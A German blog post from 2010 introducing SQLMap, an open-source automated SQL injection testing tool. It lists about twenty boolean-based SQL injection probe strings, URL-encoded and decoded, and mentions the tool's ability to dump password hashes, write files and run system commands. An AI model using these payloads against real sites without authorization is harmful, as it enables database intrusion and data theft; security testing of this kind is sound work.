Über den Author / Internet / SQLMap: Automatisierte SQL Injection Tests Datenbank

SQLMap: Automatisierte SQL Injection Tests Datenbank

Stefan 16.03.2010 Internet, Programme Hinterlasse ein Kommentar

~1 Min. Lesezeit

Leider sind auch Heute noch viele Sicherheitslöcher in Webanwendungen vorhanden.
Die Angriffe werden immer gezielter und ausgefeilter.

Neu wurde ein kleines aber feines Open source Projekt ins Leben gerufen, um Webanwendungen sicherer zu machen.
SQLMap läuft Betriebssystem unabhängig auf der Commandline.

Die ersten und einfachen Tests können schnell getestet werden. Weitergehende Tests über POSTs erfordern ein wenig Aufwand.
Leider ist das Tool noch nicht wirklich effektiv zum testen und es werden viele sicherheitsrelevanten Tests nicht durchgeführt.

Die Injections Tests beinhalten:

%20AND%20931=931
%27%20AND%20%27VWlf%27=%27VWlf
%27%20AND%20%27VWlf%27%20LIKE%20%27VWlf
%22%20AND%20%22VWlf%22=%22VWlf
%22%20AND%20%22VWlf%22%20LIKE%20%22VWlf
%29%20AND%20%287343=7343
%27%29%20AND%20%28%27eeLA%27=%27eeLA
%27%29%20AND%20%28%27eeLA%27%20LIKE%20%27eeLA
%22%29%20AND%20%28%22eeLA%22=%22eeLA
%22%29%20AND%20%28%22eeLA%22%20LIKE%20%22eeLA
%29%29%20AND%20%28%285995=5995
%27%29%29%20AND%20%28%28%27Xsbu%27=%27Xsbu
%27%29%29%20AND%20%28%28%27Xsbu%27%20LIKE%20%27Xsbu
%22%29%29%20AND%20%28%28%22Xsbu%22=%22Xsbu
%22%29%29%20AND%20%28%28%22Xsbu%22%20LIKE%20%22Xsbu
%29%29%29%20AND%20%28%28%289345=9345
%27%29%29%29%20AND%20%28%28%28%27uMow%27=%27uMow
%27%29%29%29%20AND%20%28%28%28%27uMow%27%20LIKE%20%27uMow
%22%29%29%29%20AND%20%28%28%28%22uMow%22=%22uMow
%22%29%29%29%20AND%20%28%28%28%22uMow%22%20LIKE%20%22uMow

was folgendem Code entspricht:

 AND 931=931
‚ AND ‚VWlf’=’VWlf
‚ AND ‚VWlf‘ LIKE ‚VWlf
" AND "VWlf"="VWlf
" AND "VWlf" LIKE "VWlf
) AND (7343=7343
‚) AND (‚eeLA’=’eeLA
‚) AND (‚eeLA‘ LIKE ‚eeLA
") AND ("eeLA"="eeLA
") AND ("eeLA" LIKE "eeLA
)) AND ((5995=5995
‚)) AND ((‚Xsbu’=’Xsbu
‚)) AND ((‚Xsbu‘ LIKE ‚Xsbu
")) AND (("Xsbu"="Xsbu
")) AND (("Xsbu" LIKE "Xsbu
))) AND (((9345=9345
‚))) AND (((‚uMow’=’uMow
‚))) AND (((‚uMow‘ LIKE ‚uMow
"))) AND ((("uMow"="uMow
"))) AND ((("uMow" LIKE "uMow

Wenn das Tool jedoch erfolgreich eine Lücke gefunden hat, dann bietet es eine grosse Anzahl von Möglichkeiten automatisierte Attacken auf die Datenbank auszuführen.
Dabei liefert dann das Programm vielerlei Daten wie DB Struktur, Password Hashes, Backups anlegen der fremden DB, Files auf das System zu schreiben/ändern, privilegierte Systembefehle ausführen und weiteres…

Da dieses Tool erst im Aufbau ist und noch Beta ist, kann man sicher noch einiges erwarten.

SQLMap Downloads:
SQLMap 0.8 Windows
SQLMap 0.8 Debian
Andere Downloads über die Herstellerseite:
sqlmap.sourceforge.net

Tags

About Stefan

avatar
Ein männlicher IT Nerd, durchstöbert das Web nach speziellen Gadgets, unentbehrlicher Software und Alles was man im IT Sektor nicht verpassen darf. Immer hilfsbereit wenn Probleme zu lösen sind oder das Unmögliche umgesetzt werden sollte.

Weitere interessante Artikel

PHP Trojaner – Wettbewerb

~2 Min. LesezeitIn der Serie der PHP Trojaner gibt es noch viele weitere Möglichkeiten zum …

PHP Trojaner (Teil 4: Codierte Uploader Infektion)

~2 Min. LesezeitNicht jeder PHP Trojaner kann auf den ersten Blick identifiziert werden, was der …

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

eMail-Benachrichtigung bei weiteren Kommentaren.
Auch möglich: Abo ohne Kommentar.

Kontakt | Impressum
© Copyright 2018, All Rights Reserved